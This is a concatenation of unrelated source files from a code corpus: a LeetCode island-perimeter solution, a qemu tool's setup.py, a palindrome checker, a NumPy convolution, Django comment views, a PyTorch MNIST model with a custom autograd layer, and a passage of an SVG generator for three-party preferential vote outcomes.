image = cv2.imdecode(np.fromfile(file_path, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
label = self.character_dict[character]
images.append(image)
labels.append(label)
return images, labels
| QQQQQby/Car-Plate-Recognition | classifier.py | classifier.py | py | 6,613 | python | en | code | 1 | github-code | 36 |
37635527190 | # You are given a map in form of a two-dimensional integer grid where 1 represents land and 0 represents water.
# Grid cells are connected horizontally/vertically (not diagonally). The grid is completely surrounded by water, and there is exactly one island (i.e., one or more connected land cells).
# The island doesn't have "lakes" (water inside that isn't connected to the water around the island). One cell is a square with side length 1. The grid is rectangular, width and height don't exceed 100. Determine the perimeter of the island.
# Example:
# Input:
# [[0,1,0,0],
# [1,1,1,0],
# [0,1,0,0],
# [1,1,0,0]]
# Output: 16
# Explanation: The perimeter is the 16 yellow stripes in the image below:
class Solution:
    def islandPerimeter(self, grid: 'List[List[int]]') -> 'int':
        """Return the perimeter of the single island (1 = land, 0 = water).

        Each land cell contributes one unit of perimeter for every side that
        borders water or lies on the grid boundary.
        """
        if not grid or not grid[0]:
            return 0
        rows, cols = len(grid), len(grid[0])
        perimeter = 0
        for r in range(rows):
            for c in range(cols):
                if grid[r][c] != 1:
                    continue
                for nr, nc in ((r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)):
                    if not (0 <= nr < rows and 0 <= nc < cols) or grid[nr][nc] == 0:
                        perimeter += 1
        return perimeter
| sunnyyeti/Leetcode-solutions | 463_Island_Perimeter.py | 463_Island_Perimeter.py | py | 1,476 | python | en | code | 0 | github-code | 36 |
38285078798 | from setuptools import find_packages, setup
# Assemble the long description from the project's top-level text files.
with open("README.txt") as f:
    readme = f.read() + "\n"
with open("CHANGES.txt") as f:
    readme += f.read() + "\n"
with open("HACKING.txt") as f:
    readme += f.read()
setup(
    name="fc.qemu",
    version="1.4.1.dev0",
    author="Christian Kauhaus, Christian Theune",
    author_email="mail@flyingcircus.io",
    url="http://github.com/flyingcircusio/fc.qemu",
    description="Qemu VM management utilities",
    long_description=readme,
    # Sources live under src/ (the "src layout").
    packages=find_packages("src"),
    package_dir={"": "src"},
    include_package_data=True,
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Environment :: Console",
        "Programming Language :: Python :: 3.8",
    ],
    zip_safe=False,
    license="BSD",
    namespace_packages=["fc"],
    # The commented-out pins record the last known-good releases.
    install_requires=[
        "colorama",  # ==0.3.3',
        "abaez.consulate==1.1.0",
        "psutil",  # ==5.4.2',
        "PyYaml>=5.3.1",
        "requests",  # ==2.11.1',
        "setuptools",
        "structlog>=16.1.0",
    ],
    # Console entry points: the main CLI and the per-VM supervisor helper.
    entry_points={
        "console_scripts": [
            "fc-qemu = fc.qemu.main:main",
            "supervised-qemu = fc.qemu.hazmat.supervise:main",
        ],
    },
)
| flyingcircusio/fc.qemu | setup.py | setup.py | py | 1,233 | python | en | code | 4 | github-code | 36 |
74226549222 | # Complete the function below.
def move(leftvalue, avg):
    """Count the adjacent swaps needed to gather every `leftvalue` element at
    the left end of `avg` (i.e. inversions against the other values)."""
    swaps = 0
    others_seen = 0
    for element in avg:
        if element != leftvalue:
            others_seen += 1
        else:
            # Each matching element must hop over every non-match before it.
            swaps += others_seen
    return swaps
def minMoves(avg):
    """Gather all 1s (or all 0s) at the left of `avg` via adjacent swaps,
    choosing whichever bit dominates the left half, and return the swap count.

    NOTE(review): the element at index len(avg)//2 is counted in neither half
    (`i < half_len` vs `i > half_len`), so for even-length input one element
    is ignored when picking the side -- confirm this is intentional.
    """
    print(avg)
    half_len = int(len(avg)/2)
    left_ones = 0
    right_ones = 0
    for i in range(len(avg)):
        if i < half_len:
            if avg[i]==1:
                left_ones += 1
        elif i > half_len:
            if avg[i]==1:
                right_ones += 1
    if left_ones > right_ones:
        #put one on left
        return move(1,avg)
    else:
        #put zero on left
        return move(0,avg)
# Demo: all four 1s already occupy the left half, so zero swaps are printed.
avg = [1, 1, 1, 1, 0,0,0,0]
print(minMoves(avg))
| iamzhanghao/AI_Projects | other/visa_coding_test/hello.py | hello.py | py | 808 | python | en | code | 2 | github-code | 36 |
16239896813 | def is_palindrome(word):
    # Reject words shorter than the required minimum
    if len(word) < 3:
        print("Слово должно содержать как минимум 3 символа")
        return False
    stack = []  # Create an empty stack
    # Push the first half of the word onto the stack
    for i in range(len(word) // 2):
        stack.append(word[i])
    # Pick the index from which to compare against the stack
    if len(word) % 2 == 0:  # Even word length
        start_index = len(word) // 2
    else:  # Odd word length: the middle character is skipped
        start_index = len(word) // 2 + 1
    # Compare the rest of the word with the stack (popped in reverse order)
    for i in range(start_index, len(word)):
        if word[i] != stack.pop():
            print("Слово не является палиндромом")
            return False
    print("Слово является палиндромом")
    return True
# Read the word from the user
word = input("Введите слово: ")
# Check whether the word is a palindrome (result is printed by the function)
is_palindrome(word)
| Merlin0108/rep2 | lab11/1.py | 1.py | py | 1,334 | python | ru | code | 0 | github-code | 36 |
23621436946 | #!/usr/bin/env python3
""" module """
import numpy as np
def convolve(images, kernels, padding='same', stride=(1, 1)):
""" that performs a convolution on images using multiple kernels: """
w, h, m = images.shape[2], images.shape[1], images.shape[0]
kk, kw, kh = kernels.shape[3], kernels.shape[1], kernels.shape[0]
sw, sh = stride[1], stride[0]
pw, ph = 0, 0
if padding == 'same':
ph = int(((h - 1) * sh + kh - h) / 2) + 1
pw = int(((w - 1) * sw + kw - w) / 2) + 1
if isinstance(padding, tuple):
ph = padding[0]
pw = padding[1]
images = np.pad(images,
pad_width=((0, 0),
(ph, ph),
(pw, pw),
(0, 0)),
mode='constant', constant_values=0)
new_h = int(((h + 2 * ph - kh) / sh) + 1)
new_w = int(((w + 2 * pw - kw) / sw) + 1)
output = np.zeros((m, new_h, new_w, kk))
for y in range(new_h):
for x in range(new_w):
for k in range(kk):
output[:, y, x, k] = \
(kernels[:, :, :, k] *
images[:,
y * sh: y * sh + kh,
x * sw: x * sw + kw,
:]).sum(axis=(1, 2, 3))
return output
| vandeldiegoc/holbertonschool-machine_learning | math/0x04-convolutions_and_pooling/5-convolve.py | 5-convolve.py | py | 1,330 | python | en | code | 0 | github-code | 36 |
29450013209 | from ..models import Comment
from ..serializers import CommentSerializer
from rest_framework.response import Response
from rest_framework import permissions, generics
from rest_framework.authtoken.models import Token
from rest_framework.status import HTTP_403_FORBIDDEN
class CommentDetail(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve / update / delete a single comment.

    Updates are only allowed for the profile that wrote the comment.
    """
    permission_classes = (permissions.IsAuthenticatedOrReadOnly, )
    queryset = Comment.objects.all()
    serializer_class = CommentSerializer

    def put(self, request, *args, **kwargs):
        comment = Comment.objects.get(pk=kwargs['pk'])
        # Resolve the requester's profile from the "Authorization: Token <key>"
        # header and ensure it matches the comment's writer.
        # (Renamed the local from `id` -- it shadowed the builtin.)
        token = request.headers['Authorization'].split()[1]
        requester_profile = Token.objects.get(pk=token).user.profile
        if comment.writer != requester_profile:
            return Response({"You don't have permissions to perform this action."}, status=HTTP_403_FORBIDDEN)
        # Writer and parent meeting are immutable: force the stored values back
        # so a client cannot reassign them via the payload.
        request.data['parent_meeting'] = comment.parent_meeting.id
        request.data['writer'] = comment.writer.id
        return self.update(request, *args, **kwargs)
class CommentList(generics.ListCreateAPIView):
    """List every comment, or create a new one for the authenticated profile."""
    permission_classes = (permissions.IsAuthenticatedOrReadOnly, )
    queryset = Comment.objects.all()
    serializer_class = CommentSerializer

    def post(self, request, *args, **kwargs):
        # Derive the writer from the "Authorization: Token <key>" header rather
        # than trusting client-supplied data.
        auth_token = request.headers['Authorization'].split()[1]
        request.data['writer'] = Token.objects.get(pk=auth_token).user.profile.id
        return self.create(request, *args, **kwargs)
| thunderlink/ThunderFish | backend/server/views/comment.py | comment.py | py | 1,520 | python | en | code | 3 | github-code | 36 |
31044290128 | import torch
from torch.autograd import Function
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import time
import numpy as np
#Force Determinism
# Fixed seeds plus deterministic cuDNN so repeated runs are reproducible.
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(0)
# Device configuration
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
input_size = 784
hidden_size = 500
num_classes = 10
num_epochs = 1
batch_size = 50000
learning_rate = 0.00005
# MNIST dataset
train_dataset = torchvision.datasets.MNIST(root='../../data',
                                           train=True,
                                           transform=transforms.ToTensor(),
                                           download=True)
test_dataset = torchvision.datasets.MNIST(root='../../data',
                                          train=False,
                                          transform=transforms.ToTensor())
# Data loader
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
                                           batch_size=batch_size,
                                           shuffle=False)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
                                          batch_size=batch_size,
                                          shuffle=False)
# NOTE(review): neither module-level mask is read by the visible code
# (MyFunction.forward builds its own local zero mask) -- confirm these are
# leftovers of the masking experiment.
rand_mask = torch.zeros(784)
rand_mask2 = torch.zeros(500)
class Linear(nn.Module):
    """Fully connected layer backed by the custom MyFunction autograd op.

    Mirrors nn.Linear's layout: weight is (output_features, input_features)
    and the bias is optional.
    """
    def __init__(self, input_features, output_features, bias=True):
        super(Linear, self).__init__()
        self.input_features = input_features
        self.output_features = output_features
        # nn.Parameter registers the tensors with the module so they appear in
        # .parameters() and move with .to()/.cuda().
        self.weight = nn.Parameter(torch.Tensor(output_features, input_features))
        if bias:
            self.bias = nn.Parameter(torch.Tensor(output_features))
        else:
            # Register the optional parameter as None so state_dict stays consistent.
            self.register_parameter('bias', None)

        # Simple uniform initialisation (not fan-in aware).
        self.weight.data.uniform_(-0.1, 0.1)
        # Bug fix: the original tested `if bias is not None:` -- always true
        # for a bool -- so bias=False crashed on self.bias.data below.
        if self.bias is not None:
            self.bias.data.uniform_(-0.1, 0.1)

    def forward(self, input):
        # Delegate to the custom autograd Function defined in this file.
        return MyFunction.apply(input, self.weight, self.bias)

    def extra_repr(self):
        # Bug fix: the attributes are named input_features/output_features;
        # reading self.in_features/out_features (as the original did) raised
        # AttributeError whenever the module was printed.
        return 'in_features={}, out_features={}, bias={}'.format(
            self.input_features, self.output_features, self.bias is not None
        )
# Inherit from Function
class MyFunction(Function):
    """Custom linear autograd op with additive-mask scaffolding.

    The mask is currently torch.zeros(...), so the op computes a plain
    input @ W.T (+ bias): the mask is added, then its projection is
    subtracted again.  The commented-out lines are hooks for noise-injection
    experiments.
    """
    # Note that both forward and backward are @staticmethods
    @staticmethod
    # bias is an optional argument
    def forward(ctx, input, weight, bias=None):
        # All-zero additive mask: (input + mask) @ W.T - mask @ W.T == input @ W.T.
        rand_mask = torch.zeros(input.shape)
        #weight_rand_mask = torch.ones(weight.shape)
        ctx.save_for_backward(input, weight, bias)
        input = input + rand_mask
        #weight = weight + weight_rand_mask
        output = input.mm(weight.t())
        rand_mask = rand_mask.mm(weight.t())
        output = output - rand_mask #- weight_rand_mask
        if bias is not None:
            #bias_rand_mask = torch.ones(output.shape)
            #bias = bias + bias_rand_mask
            output += bias.unsqueeze(0).expand_as(output)
            #output = output - bias_rand_mask
        #print("Forward Output: ")
        #print(output)
        #time.sleep(5)
        return output
    # This function has only a single output, so it gets only one gradient
    @staticmethod
    def backward(ctx, grad_output):
        # Standard pattern: unpack saved_tensors at the top of backward and
        # initialise all gradients w.r.t. inputs to None.  Trailing Nones are
        # ignored by autograd, which keeps the return statement simple even
        # when the function has optional inputs.
        input, weight, bias = ctx.saved_tensors
        grad_input = grad_weight = grad_bias = None
        # These needs_input_grad checks are optional and there only to
        # improve efficiency.  Returning gradients for inputs that don't
        # require them is not an error.
        if ctx.needs_input_grad[0]:
            grad_input = grad_output.mm(weight)
        if ctx.needs_input_grad[1]:
            grad_weight = grad_output.t().mm(input)
        if bias is not None and ctx.needs_input_grad[2]:
            grad_bias = grad_output.sum(0)
        #print("Grad_input: ")
        #print(grad_input)
        #time.sleep(5)
        return grad_input, grad_weight, grad_bias
# Fully connected neural network with four hidden layers
class NeuralNet(nn.Module):
    """Five-layer MLP (input -> 4x hidden -> classes) built from the custom
    ``Linear`` layer, with tanh activations between layers."""

    def __init__(self, input_size, hidden_size, num_classes):
        super(NeuralNet, self).__init__()
        self.fc1 = Linear(input_size, hidden_size)
        # One shared activation module suffices: tanh is stateless.  The
        # original re-assigned self.tanh four times, which was redundant.
        self.tanh = nn.Tanh()
        self.fc2 = Linear(hidden_size, hidden_size)
        self.fc3 = Linear(hidden_size, hidden_size)
        self.fc4 = Linear(hidden_size, hidden_size)
        self.fc5 = Linear(hidden_size, num_classes)

    def forward(self, x):
        out = self.fc1(x)
        out = self.tanh(out)
        out = self.fc2(out)
        out = self.tanh(out)
        out = self.fc3(out)
        out = self.tanh(out)
        out = self.fc4(out)
        out = self.tanh(out)
        out = self.fc5(out)
        return out
# Build the model.  NOTE(review): input_size, hidden_size, num_classes,
# device, learning_rate, num_epochs, train_loader and test_loader are
# defined earlier in this file (outside this excerpt) — confirm values there.
model = NeuralNet(input_size, hidden_size, num_classes).to(device)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, dampening=0, weight_decay=0, nesterov=False)
# Train the model
total_step = len(train_loader)
for epoch in range(num_epochs):
    for i, (images, labels) in enumerate(train_loader):
        # Move tensors to the configured device
        # (flatten each 28x28 MNIST image into a 784-vector)
        images = images.reshape(-1, 28*28).to(device)
        labels = labels.to(device)
        #rand_mask = torch.ones(784)
        #rand_mask2 = torch.ones(500)
        #for k in images:
        # k = torch.add(k, rand_mask)
        outputs = model(images)
        loss = criterion(outputs, labels)
        # Backward and optimize
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        # Log every 100 mini-batches.
        if (i+1) % 100 == 0:
            print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
                   .format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# Test the model
# In test phase, we don't need to compute gradients (for memory efficiency)
with torch.no_grad():
    correct = 0
    total = 0
    for images, labels in test_loader:
        images = images.reshape(-1, 28*28).to(device)
        labels = labels.to(device)
        outputs = model(images)
        # Predicted class = index of the max logit per row.
        _, predicted = torch.max(outputs.data, 1)
        total += labels.size(0)
        correct += (predicted == labels).sum().item()
    print('Accuracy of the network on the 10000 test images: {} %'.format(100 * correct / total))
# Save the model checkpoint
torch.save(model.state_dict(), 'model.ckpt')
| RyanKarl/SGX_NN_Training_and_Inference | examples/mnist/test_main.py | test_main.py | py | 7,871 | python | en | code | 0 | github-code | 36 |
11168036307 | #!python3
"""
Construct a mouseoverable SVG of three-party-preferred outcomes.
We'll call the three parties "blue" (x-axis), "green" (y-axis) and "red" (with R + G + B == 1).
The primary methods that you'll want to call are `get_args` and `construct_svg`.
"""
from typing import Tuple
import sys
import math
from enum import Enum
import argparse
# Stylesheet embedded into the generated SVG; can be overridden at runtime
# via the --css command-line option (see get_args / construct_svg).
DEFAULT_CSS = """
text {font-family: sans-serif; font-size: 10px; fill: #222;}
text.label {filter: url(#keylineEffect); font-weight: bold}
/* dot, red, green, blue, tie*/
.d {opacity:0.6;}
.d:hover {opacity:1;}
.r {fill: #d04}
.g {fill: #0a2}
.b {fill: #08e}
.t {fill: #888}
/* point of interest */
.poi {stroke:#000; fill-opacity:0.4; stroke-width: 0.3%}
.line {stroke: #222; stroke-width: 0.5%; fill:none; stroke-linecap:round;}
#triangle {fill: #222}
.arrow {fill:none; stroke:#111; stroke-width:0.5%; stroke-dasharray:4 2; stroke-dashoffset:0;}
.bg {fill: #fff}
"""
class Party(Enum):
    """The three contenders.

    Each value is a ``(display name, SVG CSS class)`` pair; the CSS classes
    match the rules in DEFAULT_CSS.
    """
    RED = ("Labor", "r")
    GREEN = ("Greens", "g")
    BLUE = ("Coalition", "b")
# NOTE: throughout this file we'll use a variable called `A` to store our general state
# This replaces the original and pervasive use of globals.
# Default values are set in `get_args`
def p2c(blue_pct: float, green_pct: float, A: argparse.Namespace) -> Tuple[float, float]:
    '''Map percentage-space (blue, green) to SVG pixel coordinates.

    Blue runs left-to-right along x, green bottom-to-top along y; the
    plotted window is [A.start, A.stop] on both axes.  Out-of-frame inputs
    are NOT clipped here — callers needing clipping use line().
    '''
    span = A.stop - A.start
    blue_frac = (blue_pct - A.start) / span
    green_frac = (green_pct - A.start) / span
    x = blue_frac * A.inner_width + A.offset * A.scale
    y = (1 - green_frac) * A.inner_width + A.scale
    return (x, y)
def calculate_winner(red_pct: float, green_pct: float, blue_pct: float, A: argparse.Namespace) -> Tuple[Party, float]:
    '''Given 3PP percentages, calculate the winner and their 2CP result.
    Ties for third are resolved where the winner is the same either way,
    with the tighter 2CP result reported.
    Falls through (implicitly returning None) for unresolved ties; callers
    treat the resulting unpacking TypeError as "tie".'''
    # Tolerance-aware comparisons: two shares within A.step/10 of each other
    # are treated as equal, so grid points land deterministically.
    def eq(x, y):
        """Equal, to a certain tolerance"""
        # sufficiently close for our purposes
        return math.isclose(x, y, abs_tol=A.step/10)
    def lt(x, y):
        """Strictly less than, beyond a certain tolerance"""
        return (x < y) and not eq(x, y)
    def gt(x, y):
        """Strictly greater than, beyond a certain tolerance"""
        return lt(y, x)
    # need to figure out who came third, then who won
    if lt(red_pct, green_pct) and lt(red_pct, blue_pct):
        # Red came third: its vote splits between Green and Blue per the
        # configured preference flow.
        tcp = green_pct + (A.red_to_green * red_pct)
        if gt(tcp, 0.5):
            return (Party.GREEN, tcp)
        elif gt(1.0 - tcp, 0.5):
            return (Party.BLUE, 1.0 - tcp)
    if lt(green_pct, red_pct) and lt(green_pct, blue_pct):
        # Green came third
        tcp = red_pct + (A.green_to_red * green_pct)
        if gt(tcp, 0.5):
            return (Party.RED, tcp)
        elif gt(1.0 - tcp, 0.5):
            return (Party.BLUE, 1.0 - tcp)
    if lt(blue_pct, green_pct) and lt(blue_pct, red_pct):
        # Blue came third
        tcp = red_pct + (A.blue_to_red * blue_pct)
        if gt(tcp, 0.5):
            return (Party.RED, tcp)
        elif gt(1.0 - tcp, 0.5):
            return (Party.GREEN, 1.0 - tcp)
    # print("likely tie:", green_pct, red_pct, blue_pct, file=sys.stderr)
    # resolve some ties for third
    # if the leading party would win EITHER way, report their win and tightest margin
    # else, return nothing (interpreted as a tie)
    if eq(green_pct, blue_pct) and lt(green_pct, red_pct):
        # Red leading
        gex = green_pct * A.green_to_red
        bex = blue_pct * A.blue_to_red
        if red_pct + gex > 0.5 and red_pct + bex > 0.5:
            return (Party.RED, red_pct + min(gex, bex))
    if eq(red_pct, blue_pct) and lt(red_pct, green_pct):
        # Green leading
        rex = red_pct * A.red_to_green
        bex = blue_pct * A.blue_to_green
        if green_pct + rex > 0.5 and green_pct + bex > 0.5:
            return (Party.GREEN, green_pct + min(rex, bex))
    if eq(green_pct, red_pct) and lt(green_pct, blue_pct):
        # Blue leading
        gex = green_pct * A.green_to_blue
        rex = red_pct * A.red_to_blue
        if blue_pct + gex > 0.5 and blue_pct + rex > 0.5:
            return (Party.BLUE, blue_pct + min(gex, rex))
    # print("actual tie:", green_pct, red_pct, blue_pct, file=sys.stderr)
    # Unresolved tie: fall through and return None implicitly.
def construct_dot(blue_pct: float, green_pct: float, A: argparse.Namespace) -> str:
    '''Given green and blue percentages, return an SVG fragment corresponding to a dot at the appropriate position.

    The dot carries a CSS class for the winning party ("t" for ties) and a
    <title> tooltip describing the 3CP split and the 2CP outcome.
    '''
    red_pct = 1.0 - (green_pct + blue_pct)
    (x, y) = p2c(blue_pct, green_pct, A)
    tooltip_3cp = f"{Party.GREEN.value[0]}: {green_pct:.1%}, {Party.RED.value[0]}: {red_pct:.1%}, {Party.BLUE.value[0]}: {blue_pct:.1%}."
    # BUG FIX: the original signalled a tie by letting the tuple-unpacking of
    # calculate_winner's implicit None raise TypeError, which would also have
    # swallowed any genuine TypeError raised inside calculate_winner.  Check
    # for None explicitly instead.
    outcome = calculate_winner(red_pct, green_pct, blue_pct, A)
    if outcome is None:
        css_class = "t"
        tooltip = f"{tooltip_3cp} Winner: TIE"
    else:
        (winner, margin) = outcome
        css_class = winner.value[1]
        tooltip = f"{tooltip_3cp} Winner: {winner.value[0]} {margin:.1%}"
    # Tidy "12.0%" down to "12%" across the whole fragment, as before.
    return f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="{css_class} d"><title>{tooltip}</title></circle>'.replace(".0%", "%")
def frange(start, stop=None, step=None):
    '''Floating-point range generator. [start = 0.0], stop, [step = 1.0]

    Like range(), a single argument is treated as the stop value.  Values
    are computed as start + k*step to avoid accumulating float error.
    Raises ValueError for step == 0.
    '''
    start = float(start)
    # BUG FIX: the original used falsy checks (``if not stop`` /
    # ``if not step``), so an explicit stop of 0.0 triggered the
    # single-argument switcheroo and, combined with the stop-sign-based exit
    # test, could loop forever.  Compare against None and terminate based on
    # the sign of *step* instead.
    if stop is None:  # switcheroo: frange(x) == frange(0.0, x)
        stop = start
        start = 0.0
    if step is None:
        step = 1.0
    step = float(step)
    if step == 0.0:
        raise ValueError("frange() step must be non-zero")
    count = 0.0
    while True:
        t = start + count * step
        if step > 0.0 and t >= stop:
            break
        if step < 0.0 and t <= stop:
            break
        yield t
        count += 1.0
def clamp_val(val: float, lo: float, hi: float) -> float:
    """Clamp *val* into the closed interval [lo, hi]."""
    capped = min(val, hi)
    return max(capped, lo)
def clamp(val: float, A: argparse.Namespace) -> float:
    """Clamp *val* into the plotted window [A.start, A.stop]."""
    return max(min(val, A.stop), A.start)
def line(x0: float, y0: float, x1: float, y1: float, A: argparse.Namespace) -> str:
    """Takes two points (percentage-space) and returns the appropriate SVG path
    fragment, projecting out-of-frame endpoints onto the viewport edge.

    Returns an empty string when the whole segment lies outside the viewport.
    """
    # we COULD have just used <clipPath> but this is even cleaner in the SVG
    # general principle: there'll be a gradient.
    # if anything is off the edge, we can replace with appropriate point on the edge
    xa = clamp(x0, A)
    ya = clamp(y0, A)
    xb = clamp(x1, A)
    yb = clamp(y1, A)
    if math.isclose(x0, x1):
        # special case: vertical line
        # we can clamp without fear
        pass
    elif math.isclose(y0, y1):
        # horizontal line
        pass
    elif (x0 <= A.start and x1 <= A.start) or (y0 <= A.start and y1 <= A.start) or \
            (x0 >= A.stop and x1 >= A.stop) or (y0 >= A.stop and y1 >= A.stop):
        # whole of line would be off-viewport
        return ""
    else:
        # get the line equation...
        m = (y1 - y0) / (x1 - x0)  # gradient
        c = y0 - m * x0  # y-offset
        # Slide each clipped endpoint along the line to the viewport edge.
        if x0 < A.start:
            ya = m * A.start + c
        elif x0 > A.stop:
            ya = m * A.stop + c
        if x1 < A.start:
            yb = m * A.start + c
        # BUG FIX: the original tested ``x0 > A.stop`` here, so the second
        # endpoint was never projected when only x1 overshot the right edge.
        elif x1 > A.stop:
            yb = m * A.stop + c
        if y0 < A.start:
            xa = (A.start - c) / m
        elif y0 > A.stop:
            xa = (A.stop - c) / m
        if y1 < A.start:
            xb = (A.start - c) / m
        elif y1 > A.stop:
            xb = (A.stop - c) / m
    # Finally, convert to coordinates and return
    (xp, yp) = p2c(xa, ya, A)
    (xq, yq) = p2c(xb, yb, A)
    return f"M {xp:g} {yp:g} {xq:g} {yq:g}"
def draw_lines(A: argparse.Namespace) -> str:
    """Draw change-of-winner lines.

    Returns a single SVG <path> whose segments trace the Red/Green,
    Red/Blue and Blue/Green outcome boundaries, plus the g + b = 1 edge.
    """
    # There are at least 8 points to draw lines between.
    # Firstly, a line #1-#2-#3
    # 1. Green vs Red on Y axis
    (x1, y1) = (A.start, (0.5 - (A.start * A.blue_to_green)))
    # 2. Green vs Rd midpoint. Controlled by ex-Blue split
    # At max Greens-Red preferencing, it varies from
    # (0.25, 0.5) at full Blue-to-Red
    # degenerates at equal split (to terpoint)
    # (0.25, 0.25) at full Blue-to-Green
    # there's a line coming out of the terpoint that (at least for normal values)
    # marks out the "Greens 3CP >= Labor 3CP == Liberal 3CP"
    # 1 - (g+b) = b
    # and another coming in from #1 that marks the Labor-Greens 2CP boundary
    # g + (b * A.blue_to_green) = 0.5
    # This point is where those lines cross: we have Greens 3CP >= Labor 3CP == Liberal 3CP
    # g = 0.5 - (b * A.blue_to_green)
    # b = 1 - ((0.5 - (b * A.blue_to_green)) + b)
    # b = 0.5 + (b * A.blue_to_green) - b
    # 2b = 0.5 + (b * A.blue_to_green)
    # b (2 - A.blue_to_green) = 0.5
    # b = 0.5 / (2 - A.blue_to_green)
    b = 0.5 / (2 - A.blue_to_green)
    g = 0.5 - (b * A.blue_to_green)
    # if A.blue_to_red is less than half, then #2 sits on the b = g line instead
    # (the gradient of the #1-#2 line is still correct)
    if A.blue_to_red <= 0.5:
        # g = 0.5 - (b * A.blue_to_green)
        # g = 0.5 - (g * A.blue_to_green)
        # g (1 + A.blue_to_green) = 0.5
        g = 0.5 / (1 + A.blue_to_green)
        b = g
    (x2, y2) = (b, g)
    # 3. the (1/3, 1/3) point ("terpoint")
    # Always some sort of boundary
    (x3, y3) = (1.0/3.0, 1.0/3.0)
    # Line #1-#2-#3 represents the Red/Green boundary
    red_green = f'{line(x1, y1, x2, y2, A)} {line(x2, y2, x3, y3, A)}'
    # 4. Red vs Blue midpoint. Basically the inverse of #2, parameterised by ex-Green split
    # same as above except swap b and g and use GREEN_TO_*
    g = 0.5 / (2 - A.green_to_blue)
    b = 0.5 - (g * A.green_to_blue)
    if A.green_to_red <= 0.5:
        b = 0.5 / (1 + A.green_to_blue)
        g = b
    (x4, y4) = (b, g)
    # 5. Red vs Blue on X axis
    (x5, y5) = (0.5 - A.start * A.green_to_blue, A.start)
    # Lines #3 - #4 - #5 represents the Red/Blue boundary
    red_blue = f'{line(x3, y3, x4, y4, A)} {line(x4, y4, x5, y5, A)}'
    # 6. Blue vs Green point. This is controlled by Red's Blue/Green split
    # there's one line coming "out" of the terpoint #3
    # (it's NW if red favours blue, SE if red favours green)
    # and one out of the hapoint #7 (the Red-comes-third line)
    # (mostly W if red favours blue, mostly S if red favours green)
    # This point occurs where these two lines cross
    # (if red favours blue, then red and blue will be equal here)
    # (if red favours green, then red and green will be equal here)
    # degenerates to terpoint if equal ex-Red split
    # terpoint degeneration (A.red_to_blue == 0.5)
    b = 1.0/3.0
    g = 1.0/3.0
    if A.red_to_green == 0.0:
        b = 0.25
        g = 0.5
    elif A.red_to_blue == 0.0:
        b = 0.5
        g = 0.25
    elif A.red_to_blue < 0.5:
        # red's coming third and favouring green
        # we follow the b >= (r == g) line out of the terpoint
        # (1 - (b+g)) == g
        # 1 - b = 2g
        # g = (1 - b)/2
        # we also follow the green == blue 2CP from the hapoint
        # b + r * A.red_to_blue == g + r - r * A.red_to_blue == 0.5
        # b + r * A.red_to_blue = 0.5
        # b + (1 - (b+g))*A.red_to_blue = 0.5
        # b + (1 - (b + ((1-b)/2))) * A.red_to_blue = 0.5
        # b + (1 - (b + 0.5 - 0.5b)) * A.red_to_blue = 0.5
        # b + (1 - (b + 1)/2) * A.red_to_blue = 0.5
        # b + ((1 - b) * A.red_to_blue / 2) = 0.5
        # b - b*A.red_to_blue/2 + A.red_to_blue/2 = 0.5
        # 2b - b*A.red_to_blue + A.red_to_blue = 1
        # b * (2 - A.red_to_blue) + A.red_to_blue = 1
        # b = A.red_to_green / (2 - A.red_to_blue)
        b = A.red_to_green / (2 - A.red_to_blue)
        g = (1 - b)/2
    elif A.red_to_blue > 0.5:
        # transpose of the < 0.5 case...
        g = A.red_to_blue / (2 - A.red_to_green)
        b = (1 - g)/2
    (x6, y6) = (b, g)
    # 7. Green vs Blue on 45 (hapoint)
    # Also always some sort of boundary
    (x7, y7) = (0.5, 0.5)
    # Lines #3 - #6 - #7 represents the Blue/Green boundary
    blue_green = f'{line(x3, y3, x6, y6, A)} {line(x6, y6, x7, y7, A)}'
    # Unconditionally we also have a line down y = 1 - x
    # (this passes through the hapoint too, but no direction change)
    (xtop, ytop) = p2c(1.0 - A.stop, A.stop, A)
    (xright, yright) = p2c(A.stop, 1.0 - A.stop, A)
    top_right = f'M {xtop:g} {ytop:g} {xright:g} {yright:g}'
    # OK, time to draw all the lines!
    return f'\r\n<path d="{red_green} {red_blue} {blue_green} {top_right}" class="line" />\r\n'
def draw_pois(A: argparse.Namespace) -> str:
    """Draw points of interest, as appearing in the specified CSV file.

    CSV rows are ``blue, green[, label]``; malformed rows are reported to
    stderr and skipped.  ``A.input == "-"`` reads from standard input.
    """
    import csv
    out = ""
    # BUG FIX: the original opened A.input and never closed it.  Close the
    # handle in a finally block — but never close sys.stdin.
    source = sys.stdin if A.input == "-" else open(A.input, 'r')
    try:
        for row in csv.reader(source):
            try:
                r0 = float(row[0])
                r1 = float(row[1])
                if r0 + r1 > 1.0:
                    raise ValueError("sum of X and Y columns must be <= 1")
                r2 = row[2] if len(row) > 2 else ""
                (x, y) = p2c(r0, r1, A)
                tooltip = f"{r2}\n{Party.GREEN.value[0]}: {r1:.1%}, {Party.RED.value[0]}: {(1 - (r1+r0)):.1%}, {Party.BLUE.value[0]}: {r0:.1%}.".replace(
                    ".0%", "%")
                try:
                    (winner, margin) = calculate_winner(1 - (r0 + r1), r1, r0, A)
                    tooltip += f"\nWinner: {winner.value[0]} {margin:.1%}".replace(
                        ".0%", "%")
                except TypeError:  # tie: calculate_winner returned None
                    tooltip += "\nWinner: TIE"
                out += f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="d poi"><title>{tooltip}</title></circle>\r\n'
            except (TypeError, IndexError, ValueError) as e:
                print("Could not parse input row:", e, file=sys.stderr)
                print(row, file=sys.stderr)
    finally:
        if source is not sys.stdin:
            source.close()
    return out
def construct_svg(A: argparse.Namespace) -> str:
    """Returns an SVG of the graph for given parameters as specified in `A`."""
    # let's output some SVG!
    out = ""
